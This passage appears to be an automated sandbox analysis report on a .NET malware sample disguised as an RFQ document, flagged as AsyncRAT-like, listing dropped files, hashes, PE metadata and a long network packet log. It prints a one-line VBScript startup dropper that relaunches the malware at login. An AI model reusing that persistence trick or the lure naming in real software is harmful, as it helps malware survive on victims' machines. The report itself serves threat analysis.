....?......{....:..{....oD...X:..{....oD...YN.{......('...oV..."..(-...*

C:\Users\user\AppData\Roaming\Count.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Download File

Process:	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.700070520364181
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiEaKC5yjn:FER/lFHIwknaZ5s
MD5:	B7B6811983F114787E6D28702308C6F2
SHA1:	5BA48CB2DD40DB58FD9C48B2102B676A04F2C35E
SHA-256:	971C112651121F94A06C1536F27F815FDC9A8E95973BFE1CEEBF8B16786FAD98
SHA-512:	A50BACE60CCCD25F0DDA9F859FBFD2EC2F0CA1AE9AAE4A4F8BEC459664DEB278EBDE233D5A527FD268A2AEDC046DDC509E7B171F45ED97E2DEE186C4E5537FBF
Malicious:	true
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Count.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.481702907597321
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	RFQ-12202431_ACD_Group.pif.exe
File size:	25'600 bytes
MD5:	07a7551da7299874afd2c3e299eca83a
SHA1:	250884b7f1c7b152ca82f663d2e91986cec83db5
SHA256:	579054d208bdfde13c82c6c998e981f0559f69908a1ebc34249c2657a5d1c59d
SHA512:	4d737e13a950b27356c086751d293731dd5b9400fd1c32f6649391cd6c4b4b8fec1b7b2ddd90b1f185c3ffb06cacb74821324721ff44ca4534612fdc1899aef9
SSDEEP:	384:bTrwOQnF8OrQ96Y8SvNRWrOeY98CfRPdVUvMrELDw+YjzUZ+9q6VDejz8Tu:bfwpn69b8ARW+9jMzZiDFejYa
TLSH:	11B23A24A3ED4322DBFD5BB96CB1558457F3FA057CA2EB8E0D8C60961D43B805E1136B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....vg.................Z..........ny... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40796e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6776D815 [Thu Jan 2 18:16:53 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7914	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x576	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5974	0x5a00	09abe16be7b1b542d8b86017edbbc681	False	0.4894965277777778	data	5.669412532977577	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x576	0x600	992779741655bdc9e56201db6ab80acc	False	0.4075520833333333	data	3.9829735486891544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	f4394cc51612caf875db9f4c5cb9b407	False	0.044921875	data	0.07763316234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80a0	0x2ec	data			0.43716577540106955
RT_MANIFEST	0x838c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T01:50:15.163815+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	193.187.91.218	50787	192.168.2.4	49736	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 01:49:54.553246021 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:54.553304911 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:54.553375959 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:54.567090988 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:54.567111969 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.214307070 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.214404106 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.226963043 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.226988077 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.227221012 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.271694899 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.408687115 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.455333948 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.546835899 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.546866894 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.546876907 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.546983004 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.546998978 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.586219072 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.586313009 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.586327076 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.631089926 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.636972904 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.636985064 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.637037992 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.637048006 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.637109995 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.637758017 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.637765884 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.637808084 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.637813091 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.637856960 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.638657093 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.638665915 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.638715982 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.676781893 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.676794052 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.676868916 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.727406025 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.727413893 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.727482080 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.728256941 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.728265047 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.728312969 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.728324890 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.728326082 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.728338003 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.728379011 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.729178905 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.729234934 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.730043888 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.730101109 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.730885029 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.730943918 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.731000900 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.731065035 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.767628908 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.767709017 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.818089962 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.818157911 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.818213940 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.818274975 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.818945885 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.819000006 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.819017887 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.819027901 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.819044113 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.819068909 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.819552898 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.819602013 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.820183039 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.820235968 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.820262909 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.820316076 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.820388079 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.820451975 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.821240902 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.821296930 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.821363926 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.821423054 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.822149992 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.822236061 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.822279930 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.822338104 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.823146105 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.823209047 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.826040030 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.830997944 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.858032942 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.858088017 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.858163118 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.858221054 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.901966095 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.902019978 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.908891916 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.908970118 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.909189939 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.909255981 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.909337997 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.909395933 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.909477949 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.909533978 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.909650087 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.909703970 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.909826040 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.909881115 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.910197020 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.910248995 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.910356998 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.910408974 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.913799047 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.913877010 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.914011002 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.914076090 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.914227962 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.914287090 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.914496899 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.914551020 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.914633036 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.914686918 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.914902925 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.914963961 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.948642969 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.948720932 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.999208927 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.999260902 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.999295950 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.999422073 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.999497890 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.999588966 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.999640942 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.999737978 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.999799013 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.999833107 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.999887943 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:55.999939919 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:55.999989986 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.000104904 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.000160933 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.000220060 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.000283957 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.000726938 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.000771999 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.000780106 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.000788927 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.000824928 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.000837088 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.000926018 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.000977039 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.001064062 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.001116991 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.001120090 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.001132965 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.001172066 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.001310110 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.001373053 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.001452923 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.001507998 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.001517057 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.001580954 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.039346933 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.039428949 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.090183020 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.090265989 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.090513945 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.090578079 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.090615034 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.090677023 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.090795994 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.090845108 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.090985060 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091032028 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.091113091 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091152906 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091166973 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.091176033 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091201067 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.091222048 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.091423035 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091468096 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091473103 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.091480017 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091520071 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.091542006 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.091624022 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091672897 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091676950 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.091685057 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.091727972 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.092005014 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.092061043 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.092087030 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.092133045 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.092145920 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.092171907 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.092173100 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.092185020 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.092217922 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.092237949 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.092288017 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.092340946 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.104844093 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.104954958 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.129931927 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.130017996 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.180913925 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.180999994 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.181094885 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.181153059 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.181201935 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.181255102 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.181382895 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.181432962 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.181452990 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.181505919 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.181580067 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.181632996 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.181782007 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.181833982 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.181844950 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.181896925 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.182152987 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.182193995 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.182209969 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.182218075 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.182243109 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.182265043 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.182336092 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.182383060 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.182424068 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.182476044 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.182715893 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.182765961 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.182917118 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.182971001 CET	49730	443	192.168.2.4	209.58.149.225
Jan 3, 2025 01:49:56.182979107 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.182988882 CET	443	49730	209.58.149.225	192.168.2.4
Jan 3, 2025 01:49:56.183034897 CET	49730	443	192.168.2.4	209.58.149.225
